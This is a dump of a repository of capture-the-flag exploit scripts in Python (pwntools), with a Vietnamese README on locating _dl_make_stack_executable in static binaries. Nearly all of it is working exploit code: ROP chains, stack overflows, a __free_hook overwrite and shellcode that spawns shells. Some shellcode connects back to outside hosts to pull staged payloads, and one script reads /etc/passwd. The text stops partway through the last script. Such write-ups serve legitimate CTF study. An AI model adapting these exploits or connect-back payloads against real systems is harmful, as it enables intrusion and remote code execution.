2019/onewrite/onewrite: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/Insomni'hack teaser 2019/onewrite/onewrite -------------------------------------------------------------------------------- /2019/Insomni'hack teaser 2019/onewrite/onewrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | if (sys.argv[1] == "local"): 6 | r = process("./onewrite") 7 | else: 8 | r = remote("onewrite.teaser.insomnihack.ch", 1337) 9 | 10 | def 
pause(s="pause!"): 11 | time.sleep(0.1) 12 | # raw_input(s) 13 | 14 | context.arch = "amd64" 15 | 16 | r.recvuntil(" > ") 17 | r.sendline("1") 18 | stack = int(r.recvline().strip(),16) 19 | log.info("stack: %s" % hex(stack)) 20 | 21 | r.recvuntil("address : ") 22 | r.send(str(stack+0x18)) 23 | r.recvuntil("data : ") 24 | r.send("\x04") 25 | pause() 26 | r.recvuntil(" > ") 27 | r.sendline("2") 28 | base_text = int(r.recvline().strip(),16) - 0x8A15 29 | log.info("base_text: %s" % hex(base_text)) 30 | 31 | do_leak = base_text + 0x8A15 32 | do_overwrite = base_text + 0x89C3 33 | main = base_text + 0x8B04 34 | 35 | r.recvuntil("address : ") 36 | r.send(str(stack+0x18)) # overwrite leak ret_addr 37 | r.recvuntil("data : ") 38 | r.send("\x04") 39 | pause() 40 | #=============================================== 41 | def overwrite(where,what): 42 | log.info("overwrite at %#x value %#x" % (where, what)) 43 | global stack 44 | r.recvuntil(" > ") 45 | 46 | r.send(p64(main)) 47 | 48 | r.recvuntil("address : ") 49 | r.send(str(stack-0x8)) #overwrite over ret_addr 50 | r.recvuntil("data : ") 51 | r.send(p64(main)) 52 | 53 | r.recvuntil(" > ") 54 | r.send(p64(0x4242424242424242)) 55 | 56 | r.recvuntil("address : ") 57 | r.send(str(stack-0x28)) #overwrite over ret_addr 58 | r.recvuntil("data : ") 59 | r.send(p64(do_overwrite)) 60 | r.recvuntil("address : ") 61 | r.send(str(where)) 62 | r.recvuntil("data : ") 63 | r.send(p64(what)) 64 | 65 | stack -= 0x28 66 | 67 | #============================================== 68 | _dl_make_stack_executable = base_text + 0x78190 69 | __stack_prot = base_text + 0x2B0D50 70 | _dl_pagesize = base_text + 0x2B2218 71 | pop_rax = base_text + 0x460ac # pop rax ; ret 72 | pop_rdx = base_text + 0x484c5 # pop rdx ; ret 73 | pop_rsi = base_text + 0xd9f2 # pop rsi ; ret 74 | pop_rdi = base_text + 0x84fa # pop rdi ; ret 75 | mov_dword_rdx_rax = base_text + 0x3ec74 # mov dword ptr [rdx], eax ; ret 76 | call_rsp = base_text + 0x5373d 77 | read = base_text + 
0x460F0 78 | mprotect = base_text + 0x47070 79 | ret = base_text + 0x8B0E 80 | i = 8 81 | curr_stack = stack 82 | overwrite(curr_stack+i,pop_rdi); i+=8 83 | overwrite(curr_stack+i,0); i+=8 84 | overwrite(curr_stack+i,pop_rsi); i+=8 85 | overwrite(curr_stack+i,curr_stack+0x48); i+=8 86 | overwrite(curr_stack+i,pop_rdx); i+=8 87 | overwrite(curr_stack+i,0x100); i+=8 88 | overwrite(curr_stack+i,read); i+=8 89 | overwrite(curr_stack+i,ret); i+=8 90 | 91 | def back(curr_stack, address, value): 92 | r.recvuntil(" > ") 93 | r.send(p64(0x1234)) 94 | r.recvuntil("address : ") 95 | r.send(str(address)) #overwrite over ret_addr 96 | r.recvuntil("data : ") 97 | r.send(p64(value)) 98 | 99 | for i in xrange(stack+0x18, curr_stack-0x28, 0x28): 100 | # log.info("i: %#x" % i) 101 | back(curr_stack, i, ret) 102 | back(curr_stack, curr_stack-0x1000, ret) 103 | 104 | 105 | back(curr_stack, curr_stack-(0x330-20*0x28), ret) 106 | payload = p64(pop_rsi) 107 | payload += p64(0xae000) 108 | payload += p64(pop_rdx) 109 | payload += p64(7) 110 | payload += p64(pop_rdi) 111 | payload += p64(base_text) 112 | payload += p64(mprotect) 113 | payload += p64(pop_rdi) 114 | payload += p64(0) 115 | payload += p64(pop_rsi) 116 | payload += p64(base_text+0x500) 117 | payload += p64(pop_rdx) 118 | payload += p64(0x100) 119 | payload += p64(read) 120 | payload += p64(base_text+0x500) 121 | r.sendline(payload) 122 | time.sleep(2) 123 | r.sendline(asm(shellcraft.amd64.linux.sh())) 124 | r.interactive() 125 | -------------------------------------------------------------------------------- /2019/defcon/speedrun/speedrun-001/speedrun-001: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/defcon/speedrun/speedrun-001/speedrun-001 -------------------------------------------------------------------------------- /2019/defcon/speedrun/speedrun-001/speedrun-001.1: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/defcon/speedrun/speedrun-001/speedrun-001.1 -------------------------------------------------------------------------------- /2019/defcon/speedrun/speedrun-001/speedrun-001.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | import os 5 | 6 | def speedrun_001(DEBUG): 7 | 8 | context.arch = "amd64" 9 | binname = './speedrun-001' 10 | elf = ELF(binname) 11 | rop = ROP(elf) 12 | 13 | if DEBUG=="1": 14 | r = process(binname) 15 | # raw_input("debug?") 16 | elif DEBUG=="2": 17 | HOST = 'speedrun-001.quals2019.oooverflow.io' 18 | PORT = 31337 19 | r = remote(HOST,PORT) 20 | 21 | def find_gadget(gadget): 22 | gadgets = gadget.split(" ; ") 23 | found = rop.find_gadget(gadgets) 24 | if found == None: 25 | if sum(1 for _ in elf.search(asm(gadget)))==0: 26 | return None 27 | return next(elf.search(asm(gadget))) 28 | else: 29 | return rop.find_gadget(gadgets).address 30 | 31 | def find_stack_prot(): 32 | data_rel_ro = elf.get_section_by_name(".data.rel.ro").header 33 | data_rel_ro_sh_addr = data_rel_ro.sh_addr 34 | data_rel_ro_sh_size = data_rel_ro.sh_size 35 | __stack_prot = data_rel_ro_sh_addr+data_rel_ro_sh_size-4 36 | return __stack_prot 37 | 38 | def xref(search): 39 | data = os.popen('objdump -M intel -z --prefix-address -d "speedrun-001" | grep "%s"' % search).read().strip().splitlines() 40 | return data 41 | 42 | def find_dl_make_stack_executable(__stack_prot): 43 | xref_result = xref(hex(__stack_prot)[2:])[1] 44 | return int(xref_result.split(" ")[0],16)-32 45 | 46 | def find__libc_stack_end(_dl_make_stack_executable): 47 | xref_result = xref(hex(_dl_make_stack_executable+23)[2:])[0].split("# ")[1] 48 | return int(xref_result.split(" ")[0],16) 49 | 50 | def 
exploit_stack_overflow_static_binary(buffsize):
        """Overflow the `buffsize`-byte stack buffer with a ROP chain that
        makes the stack executable and then jumps into shellcode.

        Uses the helpers defined above: find_gadget, find_stack_prot,
        find_dl_make_stack_executable and find__libc_stack_end. find_gadget
        returns None for a missing gadget; that is not checked here, so
        p64() would fail rather than send a broken chain.
        """
        pop_rax_rdx_rbx = find_gadget('pop rax ; pop rdx ; pop rbx ; ret')
        mov_dword_rdx_rax = find_gadget('mov dword ptr [rdx], eax ; ret')
        pop_rdi = find_gadget('pop rdi ; ret')
        call_rsp = find_gadget('call rsp')

        # ld.so internals located inside the static image by the helpers
        # above. The addresses are used as absolutes with no leak anywhere
        # in the chain, so the target is presumably non-PIE.
        __stack_prot = find_stack_prot()
        _dl_make_stack_executable = find_dl_make_stack_executable(__stack_prot)
        __libc_stack_end = find__libc_stack_end(_dl_make_stack_executable)

        log.info("_dl_make_stack_executable: %#x" % _dl_make_stack_executable)
        log.info("__stack_prot: %#x" % __stack_prot)
        log.info("__libc_stack_end: %#x" % __libc_stack_end)
        log.info("pop_rax_rdx_rbx: %#x" % pop_rax_rdx_rbx)
        log.info("mov_dword_rdx_rax: %#x" % mov_dword_rdx_rax)
        log.info("pop_rdi: %#x" % pop_rdi)
        log.info("call_rsp: %#x" % call_rsp)
        shellcode = asm(pwnlib.shellcraft.amd64.linux.sh())
        payload = "A"*buffsize
        payload += "B"*8 # rbp
        # Step 1: __stack_prot = 7 (read|write|exec) through the mov gadget.
        payload += p64(pop_rax_rdx_rbx)
        payload += p64(7) # rax
        payload += p64(__stack_prot) # rdx
        payload += p64(0) # rbx
        payload += p64(mov_dword_rdx_rax) # __stack_prot = 7
        # Step 2: _dl_make_stack_executable(&__libc_stack_end) calls mprotect
        # on the stack with __stack_prot, which is how NX is defeated here
        # without any libc leak.
        payload += p64(pop_rdi)
        payload += p64(__libc_stack_end)
        payload += p64(_dl_make_stack_executable)
        # Step 3: when `call rsp` runs, rsp points at the bytes that follow
        # it on the stack, i.e. the shellcode.
        payload += p64(call_rsp)
        payload += shellcode
        r.send(payload)

    exploit_stack_overflow_static_binary(buffsize=0x400)

    r.interactive()

speedrun_001(sys.argv[1])

# OOO{Ask any pwner. Any real pwner. It don't matter if you pwn by an inch or a m1L3.
pwning's pwning.} -------------------------------------------------------------------------------- /2019/hitcon_quals/trick_or_treat/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/hitcon_quals/trick_or_treat/libc.so.6 -------------------------------------------------------------------------------- /2019/hitcon_quals/trick_or_treat/trick_or_treat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/hitcon_quals/trick_or_treat/trick_or_treat -------------------------------------------------------------------------------- /2019/hitcon_quals/trick_or_treat/trick_or_treat.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | 6 | def trick_or_treat(DEBUG): 7 | if DEBUG=="1": 8 | libc_file = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | r = process("./trick_or_treat") # debug with libc of system 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | libc_file = ELF("./libc.so.6") 13 | r = process("./trick_or_treat",env={"LD_PRELOAD":"./libc.so.6"}) # debug with libc.so.6 14 | raw_input("debug?") 15 | elif DEBUG=="3": 16 | libc_file = ELF("./libc.so.6") 17 | HOST = '3.112.41.140' 18 | PORT = 56746 19 | r = remote(HOST,PORT) # remote expoit 20 | 21 | r.sendlineafter("Size:","100000000") 22 | """ 23 | magic = malloc(100000000) = 0x7ffff1a85010 24 | 0x7ffff1a85000 0x7ffff79e4000 rw-p 5f5f000 0 25 | 0x7ffff79e4000 0x7ffff7bcb000 r-xp 1e7000 0 /home/phieulang/ctf/2019/HITCON/trick/libc.so.6 26 | """ 27 | r.recvuntil("Magic:") 28 | addr = int(r.recvuntil("\n").strip(),16) 29 | libc = addr + 0x5f5eff0 # 0x7ffff79e4000 (libc) - 0x7ffff1a85010 (magic) = 0x5f5eff0 30 | __malloc_hook = libc 
+libc_file.symbols["__malloc_hook"] 31 | __free_hook = libc + libc_file.symbols["__free_hook"] 32 | one_gadget = libc + 0x10a38c # fail with remote environment 33 | puts = libc + libc_file.symbols["puts"] # to confirm __free_hook triggered 34 | system = libc + libc_file.symbols["system"] 35 | log.info("address: %#x", addr) 36 | log.info("libc: %#x", libc) 37 | log.info("__malloc_hook: %s" % hex(__malloc_hook)) 38 | log.info("__free_hook: %s" % hex(__free_hook)) 39 | log.info("puts: %s" % hex(puts)) 40 | log.info("one_gadget: %s" % hex(one_gadget)) 41 | 42 | r.recvuntil("Offset & Value:\x00") 43 | offset = (__free_hook - addr) // 8 44 | r.sendline(hex(offset) + " " + hex(system)) # overwrite __free_hook with puts function address 45 | 46 | r.recvuntil("Offset & Value:\x00") 47 | payload = "2"*1024 # trigger malloc + free => __free_hook 48 | # https://code.woboq.org/userspace/glibc/stdio-common/vfscanf-internal.c.html#736 49 | payload += " " 50 | payload += "ed" # system("ed") 51 | # https://www.gnu.org/software/ed/manual/ed_manual.html 52 | r.sendline(payload) 53 | 54 | r.sendline("! id") 55 | r.sendline("! cat home/trick_or_treat/flag") 56 | r.interactive() 57 | 58 | trick_or_treat(sys.argv[1]) 59 | """ 60 | $ python trick_or_treat.py 3 61 | [*] '/home/phieulang/ctf/2019/HITCON/trick/libc.so.6' 62 | Arch: amd64-64-little 63 | RELRO: Partial RELRO 64 | Stack: Canary found 65 | NX: NX enabled 66 | PIE: PIE enabled 67 | [+] Opening connection to 3.112.41.140 on port 56746: Done 68 | [*] address: 0x7f7057649010 69 | [*] libc: 0x7f705d5a8000 70 | [*] __malloc_hook: 0x7f705d993c30 71 | [*] __free_hook: 0x7f705d9958e8 72 | [*] puts: 0x7f705d6289c0 73 | [*] one_gadget: 0x7f705d6b238c 74 | [*] Switching to interactive mode 75 | uid=1001(trick_or_treat) gid=1001(trick_or_treat) groups=1001(trick_or_treat) 76 | ! 77 | hitcon{T1is_i5_th3_c4ndy_for_yoU} 78 | ! 
79 | $ 80 | """ 81 | -------------------------------------------------------------------------------- /2019/tetctf.cf/babyfirst/babyfirst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/babyfirst/babyfirst -------------------------------------------------------------------------------- /2019/tetctf.cf/babyfirst/babyfirst.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def babyfirst(DEBUG): 6 | if DEBUG=="1": 7 | offset___libc_start_main_ret = 0x20830 8 | offset_puts = 0x000000000006f690 9 | offset_ret = 0x937 10 | offset_pop_rdi = 0x21102 11 | offset_system = 0x45390 12 | offset_str_bin_sh = 0x18cd57 13 | offset_one_gadget = 0xf02a4 # [rsp+0x50] 14 | r = process("./babyfirst") 15 | raw_input("debug?") 16 | elif DEBUG=="2": 17 | offset___libc_start_main_ret = 0x21b97 18 | offset_ret = 0x8aa 19 | offset_puts = 0x809c0 20 | offset_pop_rdi = 0x2155f 21 | offset_system = 0x4f440 22 | offset_str_bin_sh = 0x1B3E9A 23 | # offset_one_gadget = 0x4f322 # [rsp+0x40] 24 | offset_one_gadget = 0x4f2c5 # rcx = null 25 | HOST = 'babyfirst.chung96vn.cf' 26 | PORT = 31337 27 | r = remote(HOST,PORT) 28 | 29 | def menu(): 30 | return r.recvuntil("Your choice: ") 31 | 32 | def Login(username, password): 33 | r.sendline("1") 34 | r.recvuntil("User Name: ") 35 | r.send(username) 36 | if "admin" in username: 37 | r.recvuntil("Password: ") 38 | r.send(password) 39 | return menu() 40 | 41 | def Leak(): 42 | r.sendline("2") 43 | r.recvuntil("Welcome: ") 44 | res = r.recvuntil("\nTest Version only support for admin~") 45 | menu() 46 | return res 47 | 48 | def Play(): 49 | r.sendline("2") 50 | r.recvuntil("Content: ") 51 | 52 | def BOF(content): 53 | r.send(content) 54 | return r.recvline() 55 | 56 | 57 | offset_main = 0xf2d 58 | offset_bss = 
0x202500 59 | menu() 60 | username = "A"*0x10 61 | username = username.ljust(0x20,"A") 62 | password = "B"*0x20 63 | Login(username, password) 64 | Login(username, password) 65 | 66 | password = Leak()[0x20:0x40] 67 | Login("admin\n",password) 68 | Play() 69 | canary = u64("\x00"+BOF("A"*0x29)[0x29:0x29+7]) 70 | log.info("canary: %#x", canary) 71 | 72 | main = u64(BOF("A"*0x38)[0x38:0x38+6].ljust(8,"\x00"))-96 73 | log.info("main: %#x", main) 74 | binbase = main - offset_main 75 | log.info("binbase: %#x", binbase) 76 | 77 | bss = binbase + offset_bss 78 | 79 | __libc_start_main_ret = u64(BOF("A"*0x68)[0x68:0x68+6].ljust(8,"\x00")) 80 | log.info("__libc_start_main_ret: %#x", __libc_start_main_ret) 81 | 82 | libc = __libc_start_main_ret - offset___libc_start_main_ret 83 | one_gadget = libc + offset_one_gadget 84 | system = libc + offset_system 85 | str_bin_sh = libc + offset_str_bin_sh 86 | pop_rdi = libc + offset_pop_rdi 87 | puts = libc + offset_puts 88 | ret = libc + offset_ret 89 | log.info("libc: %#x", libc) 90 | log.info("one_gadget: %#x", one_gadget) 91 | log.info("puts: %#x", puts) 92 | 93 | payload = "END" 94 | payload = payload.ljust(0x28, "A") 95 | payload += p64(canary) 96 | payload += p64(bss) # rbp 97 | payload += p64(ret) # agliment rsp (https://stackoverflow.com/questions/11298230/sse-instruction-need-the-data-aligned) 98 | # payload += p64(one_gadget) # ret 99 | payload += p64(pop_rdi) # ret 100 | payload += p64(str_bin_sh) 101 | payload += p64(system) 102 | BOF(payload) 103 | 104 | 105 | r.interactive() 106 | 107 | babyfirst(sys.argv[1]) -------------------------------------------------------------------------------- /2019/tetctf.cf/babyfirst/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/babyfirst/libc-2.27.so 
-------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/README.md: -------------------------------------------------------------------------------- 1 | # sandbox 2 | ``` 3 | Sơ bộ về chương trình các bạn có thể đọc tại các writeup: 4 | https://blog.efiens.com/tetctf-2/ 5 | https://medium.com/@nghthach98/write-up-for-pwnable-challenges-tetctf-2019-a74eb177518e 6 | ``` 7 | Ở đây mình sẽ chỉ 1 cách để các bạn tìm được hàm _dl_make_stack_executable nhanh hơn. 8 | 9 | ta code 1 chương trình đơn giản như sau: 10 | ```c 11 | #include 12 | #include 13 | 14 | int main(){ 15 | printf("ledangquynhnhu"); 16 | } 17 | ``` 18 | Compile: 19 | ``` 20 | gcc test.c -o test -static 21 | ``` 22 | 23 | Mở bằng IDA tìm hàm _dl_make_stack_executable. 24 | ```c 25 | unsigned int __fastcall dl_make_stack_executable(_QWORD *a1) 26 | { 27 | __int64 v1; // rdx 28 | _QWORD *v2; // rax 29 | signed __int64 v3; // rdi 30 | _QWORD *v4; // rbx 31 | unsigned int result; // eax 32 | 33 | v1 = *a1; 34 | v2 = a1; 35 | v3 = *a1 & -dl_pagesize; 36 | if ( v1 != _libc_stack_end ) 37 | return 1; 38 | v4 = v2; 39 | result = mprotect(v3, dl_pagesize, _stack_prot); 40 | if ( result ) 41 | return __readfsdword(0xFFFFFFD0); 42 | *v4 = 0LL; 43 | dl_stack_flags |= 1u; 44 | return result; 45 | } 46 | ``` 47 | Click double vào `_stack_prot` ta thấy biến này nằm ở cuối segment `.data.rel.ro` và có giá trị là `0x1000000`. 48 | 49 | Xrefs _stack_prot ta thấy chỉ có 2 hàm dùng tới nó là `_dl_map_object_from_fd_constprop_9` và `_dl_make_stack_executable`. 50 | 51 | Trong đó `_dl_make_stack_executable` sử dụng duy nhất 1 tham số để so sánh với `_libc_stack_end` 52 | 53 | Ta thấy trong chương trình chỉ có 1 segment `.data.rel.ro`. 
54 | 55 | Áp dụng sang trường hợp binary `program` của bài ta dùng shift f7 trên IDA để mở danh sách các segment, dò xuống ta click vào segment LOAD tại địa chỉ 0x6B8EF4 nằm ngay dưới segment `.data.rel.ro` lăn chuột lên chút ta thấy ngay `.data.rel.ro:00000000006B8EF0 dword_6B8EF0 dd 1000000h`. 56 | 57 | Như vậy `dword_6B8EF0` chính là `_stack_prot`, rename lại rồi xrefs ta thấy có 2 hàm dùng tới `_stack_prot` là `sub_476560` và `sub_47F780`. 58 | 59 | Xem qua 2 hàm thì chỉ có `sub_47F780` sử dụng 1 tham số nên xác định hàm này là `_dl_make_stack_executable`. 60 | 61 | ```c 62 | unsigned int __fastcall dl_make_stack_executable(_QWORD *a1) 63 | { 64 | _QWORD *v1; // rbx 65 | __int64 v2; // rdx 66 | __int64 v3; // rdi 67 | unsigned int result; // eax 68 | 69 | v1 = a1; 70 | v2 = *a1; 71 | v3 = *a1 & -qword_6BA1F8; 72 | if ( v2 != qword_6B8AB0 ) 73 | return 1; 74 | result = sub_44A0C0(v3, qword_6BA1F8, stack_prot); 75 | if ( result ) 76 | return __readfsdword(0xFFFFFFC0); 77 | *v1 = 0LL; 78 | dword_6BA1E8 |= 1u; 79 | return result; 80 | } 81 | ``` 82 | `a1` được so sánh với `qword_6B8AB0` => `qword_6B8AB0` chính là `_libc_stack_end`. 83 | 84 | Vậy ta đã có đủ dữ kiện để dùng được `_dl_make_stack_executable`. 85 | 86 | Lần sau không cần phải compile kiểm tra nữa mà ta cứ mở IDA lên tìm segment `LOAD` ngay dưới `.data.rel.ro` là tìm được `stack_prot` là tìm được `_dl_make_stack_executable`. 
87 | -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/sandbox/program -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/sandbox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/sandbox/sandbox -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/sandbox.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def sandbox(DEBUG): 6 | if DEBUG=="1": 7 | offset_one_gadget = 0xf02a4 # [rsp+0x50] 8 | r = process(["./sandbox","./program"]) 9 | raw_input("debug?") 10 | elif DEBUG=="2": 11 | offset_one_gadget = 0xf02a4 # [rsp+0x50] 12 | r = process("./program") 13 | raw_input("debug?") 14 | elif DEBUG=="3": 15 | # offset_one_gadget = 0x4647c # [rsp+0x30] 16 | offset_one_gadget = 0xe9415 # [rsp+0x50] 17 | # offset_one_gadget = 0xea36d # [rsp+0x70] 18 | HOST = 'sandbox.chung96vn.cf' 19 | PORT = 1337 20 | r = remote(HOST,PORT) 21 | 22 | def pause(): 23 | # time.sleep(0.05) 24 | raw_input("?") 25 | 26 | context.arch = "amd64" 27 | pop_rax_rdx_rbx = 0x4816b6 # pop rax ; pop rdx ; pop rbx ; ret 28 | mov_dword_rdx_rax = 0x417e08 # mov dword ptr [rdx], eax ; ret 29 | pop_rdi = 0x400686 30 | call_rsp = 0x44a1d1 31 | 32 | __stack_prot = 0x6B8EF0 33 | __libc_stack_end = 0x6B8AB0 34 | _dl_make_stack_executable = 0x47F780 35 | 36 | shellcode = "" 37 | shellcode += asm(""" /* open new socket */ 38 | /* call socket(2, Constant('SOCK_STREAM', 0x1), 0) */ 39 | push SYS_socket /* 0x29 */ 40 | 
pop rax 41 | push 2 42 | pop rdi 43 | push SOCK_STREAM /* 1 */ 44 | pop rsi 45 | cdq /* rdx=0 */ 46 | syscall 47 | 48 | /* Put socket into rbp */ 49 | mov rbp, rax 50 | 51 | /* Create address structure on stack */ 52 | /* push '\x02\x00\x04\xd2\x7f\x00\x00\x01' */ 53 | mov rax, 0x101010101010101 54 | push rax 55 | mov rax, 0x101010101010101 ^ 0x3cc6881239050002 56 | xor [rsp], rax 57 | 58 | /* Connect the socket */ 59 | /* call connect('rbp', 'rsp', 16) */ 60 | push SYS_connect /* 0x2a */ 61 | pop rax 62 | mov rdi, rbp 63 | push 0x10 64 | pop rdx 65 | mov rsi, rsp 66 | syscall 67 | 68 | mov rdx, 0x200 69 | syscall 70 | """) 71 | """ 72 | pwnlib.shellcraft.amd64.linux.connect("18.136.198.60", 1337) 73 | sys_read(fd, rsp, 0x200) 74 | """ 75 | 76 | payload = "A"*0x30 77 | payload += "B"*8 78 | payload += p64(pop_rax_rdx_rbx) 79 | payload += p64(7) # rax 80 | payload += p64(__stack_prot) # rdx 81 | payload += p64(0) # rbx 82 | payload += p64(mov_dword_rdx_rax) 83 | payload += p64(pop_rdi) 84 | payload += p64(__libc_stack_end) 85 | payload += p64(_dl_make_stack_executable) 86 | payload += p64(call_rsp) 87 | payload += shellcode 88 | 89 | r.send(payload) 90 | 91 | 92 | r.interactive() 93 | 94 | sandbox(sys.argv[1]) -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/server.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import socket 3 | import threading 4 | # context.arch = "amd64" 5 | 6 | 7 | def shellExec(): 8 | shellcode = "90"*0x50 9 | shellcode += "6a22415a6aff41584531c96a0958bf0101010181f7010105016a075abe0101010181f6012101010f0531c031ff31d2b605be0101010181f6010105010f054831e4bc0005040067c74424042300000067c7042400000400cb" 10 | shellcode = shellcode.decode("hex") 11 | return shellcode 12 | """ 13 | 0: 6a 22 push 0x22 14 | 2: 41 inc ecx 15 | 3: 5a pop edx 16 | 4: 6a ff push 0xffffffff 17 | 6: 41 inc ecx 18 | 7: 58 pop eax 19 | 8: 45 inc ebp 20 | 9: 31 
c9 xor ecx,ecx 21 | b: 6a 09 push 0x9 22 | d: 58 pop eax 23 | e: bf 01 01 01 01 mov edi,0x1010101 24 | 13: 81 f7 01 01 05 01 xor edi,0x1050101 25 | 19: 6a 07 push 0x7 26 | 1b: 5a pop edx 27 | 1c: be 01 01 01 01 mov esi,0x1010101 28 | 21: 81 f6 01 21 01 01 xor esi,0x1012101 29 | 27: 0f 05 syscall 30 | /* SYS_mmap(0x40000, 0x2000, 0x7, 0x22, -1, 0) */ 31 | 29: 31 c0 xor eax,eax 32 | 2b: 31 ff xor edi,edi 33 | 2d: 31 d2 xor edx,edx 34 | 2f: b6 05 mov dh,0x5 35 | 31: be 01 01 01 01 mov esi,0x1010101 36 | 36: 81 f6 01 01 05 01 xor esi,0x1050101 37 | 3c: 0f 05 syscall 38 | /* SYS_read(0, 0x40000, 0x500) */ 39 | 3e: 48 dec eax 40 | 3f: 31 e4 xor esp,esp 41 | 41: bc 00 05 04 00 mov esp,0x40500 42 | 46: 67 c7 44 24 04 23 00 mov DWORD PTR [si+0x24],0x2304 43 | 4d: 00 44 | 4e: 00 67 c7 add BYTE PTR [edi-0x39],ah 45 | 51: 04 24 add al,0x24 46 | 53: 00 00 add BYTE PTR [eax],al 47 | 55: 04 00 add al,0x0 48 | 57: cb retf 49 | /* switch mode */ 50 | """ 51 | 52 | 53 | s = server(1337) 54 | server_conn = s.next_connection() 55 | server_conn.send(shellExec()) 56 | raw_input("?") 57 | path = "/home/sandbox/flag" 58 | payload = asm(pwnlib.shellcraft.open(path), arch = 'i386', os = 'linux') 59 | payload += asm(shellcraft.read(1, 0x40500, 0xff), arch = 'i386', os = 'linux') 60 | payload += asm(shellcraft.write(0, 0x40500, 0xff), arch = 'i386', os = 'linux') 61 | server_conn.send(payload) 62 | server_conn.interactive() -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2019/tetctf.cf/sandbox/test -------------------------------------------------------------------------------- /2019/tetctf.cf/sandbox/test.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | 
printf("ledangquynhnhu"); 6 | } 7 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyfmt/babyfmt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2020/tetctf/babyarmshellcode/binary/babyfmt/babyfmt -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyfmt/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | 4 | timeout 10 /home/babyfmt/babyfmt 5 | 6 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyshellcode/babyshellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2020/tetctf/babyarmshellcode/binary/babyshellcode/babyshellcode -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/binary/babyshellcode/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | 4 | #timeout 60 /home/babyshellcode/babyshellcode 5 | /home/babyshellcode/babyshellcode 6 | 7 | 8 | -------------------------------------------------------------------------------- /2020/tetctf/babyarmshellcode/solution/babyshellcode.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | context.arch = "thumb" 6 | 7 | def babyshellcode(DEBUG): 8 | if DEBUG=="1": 9 | r = process("./babyshellcode") 10 | # raw_input("debug?") 11 | elif DEBUG=="2": 12 | HOST = '212.47.229.147' 13 | PORT = 9999 14 | r = remote(HOST,PORT) 15 | 16 | def calc(addr): 17 | addr_h = hex(addr)[2:] 18 
| res = "c"+addr_h[0]+"f2"+addr_h[2:]+addr_h[1]+"2" 19 | return res.decode("hex") 20 | 21 | def sock_send(size): 22 | payload = asm(shellcraft.read("r10", 'sp', size)) 23 | payload += asm(shellcraft.write("r6", 'sp', size)) 24 | return payload 25 | 26 | def sock_recv(size): 27 | payload = asm(shellcraft.read("r6", 'sp', size)) 28 | payload += asm(shellcraft.write("r10", 'sp', size)) 29 | return payload 30 | 31 | def fmt_read(): 32 | return asm(shellcraft.read("r6", 'sp', 0x100)) 33 | 34 | 35 | def shellcode_getFlag(): 36 | payload = "\x00\x00\x00\x00\x50\x90\x50\x90\x50\x90\x50\x90" 37 | payload += asm(pwnlib.shellcraft.arm.linux.connect("157.230.46.201", 1337)) # r10 38 | payload += asm("mov r10, r6") 39 | payload += asm(pwnlib.shellcraft.arm.linux.connect("127.0.0.1", 8888)) # r6 40 | payload += fmt_read() 41 | payload += sock_send(9) # "%52$p---" 42 | payload += sock_recv(11) # 0x48e010 43 | payload += fmt_read() 44 | payload += sock_send(0xc) # get flag 45 | payload += sock_recv(0x100) 46 | return payload 47 | 48 | def shellcode_readFile(): 49 | filename = "/etc/passwd" 50 | # filename = "/home/babyfmt/babyfmt" 51 | payload = "\x00\x00\x00\x00\x50\x90\x50\x90\x50\x90\x50\x90" 